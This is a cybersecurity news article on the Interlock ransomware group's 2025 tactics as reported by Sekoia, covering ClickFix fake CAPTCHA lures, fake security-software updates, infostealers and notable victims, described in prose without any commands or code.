The emerging ransomware group Interlock was observed evolving its tactics in early 2025, leveraging the ClickFix social-engineering technique and infostealers in its attacks, Sekoia.io reported Wednesday.  Interlock first emerged in late September and has largely flown under the radar due to its modest victim count of 24, according to Sekoia, which includes six victims claimed this year.However, Interlock’s attacks, which mostly target organizations in North America and Europe, have had a significant impact, with its attack on the Texas Tech University Health Sciences Center leading to the compromise of nearly 1.5 million patients’ data.“Despite its relatively low victim count in Q1 2025, the group has demonstrated adaptability and innovation in its tactics,” the Sekoia blog stated.The group works independently, rather than as a ransomware-as-a-service (RaaS) operator or affiliate and mainly uses fake updater downloads to trick victims into installing their malware.Interlock previously used fake browser updates, including for Google Chrome and Microsoft Edge, as lures, but began using fake security software updates, masquerading as FortiClient, Ivanti Secure Access, Palo Alto Networks Global Protect and more, in January 2025.Also in January 2025, Sekoia observed Interlock leveraging the social-engineering technique known as ClickFix, which uses fake CAPTCHA prompts to convince victims to copy and paste PowerShell commands into their Windows terminal.This technique has seen increasing popularity since August 2024, according to Group-IB, and has also been used in attacks by the North Korean threat group Lazarus, in the ClearFake infostealer distribution campaign and in a March 2025 supply chain attack affecting more than 100 car dealerships.Interlock used compromised legitimate websites to promote their fake updater downloads, as well as present fake Cloudflare CAPTCHAs, which instruct victims to copy and paste the malicious command to proceed.In these ClickFix campaigns, which were last observed in February 2025, the PowerShell command installs a PyInstaller file that includes an embedded script that is executed to deploy a PowerShell backdoor. The command also opens the legitimate Advanced IP Scanner webpage in the browser to mislead the user.Sekoia noted it did not observe additional payloads being installed or executed via this backdoor, suggesting that Interlock sought to experiment with the social-engineering technique. However, in addition to ransomware, Interlock has been known to use keyloggers and infostealers in its campaigns.Most recently, since January and February 2025, respectively, Interlock has added BerserkStealer and LummaStealer to its arsenal. While little information is available about BerserkStealer, LummaStealer, also known as LummaC2, is a popular malware-as-a-service (MaaS) offering observed since 2022.“Interlock continued to improve their tools and methods, which reflects a willingness to maintain relevance while avoiding the large-scale visibility associated with more prolific ransomware groups such as the attention-seeker FunkSec ransomware group,” the Sekoia researchers wrote.Beyond these evolving tactics, Interlock has consistently utilized its own custom ransomware for Windows and Linux as well as a novel remote access trojan (RAT) backdoor known as Interlock RAT. The group mainly uses the remote desktop protocol (RDP) and the credentials it retrieves from its infostealers to achieve lateral movement, and has also used PuTTY and AnyDesk for remote access.Interlock’s ransom note was recently modified to emphasize potential legal liability of the victim company if stolen data is leaked.Earlier this month, Interlock claimed an attack against the National Defense Corporation, a subsidiary of ammunition and home appliance manufacturer National Presto Industries, alleging that it stole nearly 3 million files in the attack.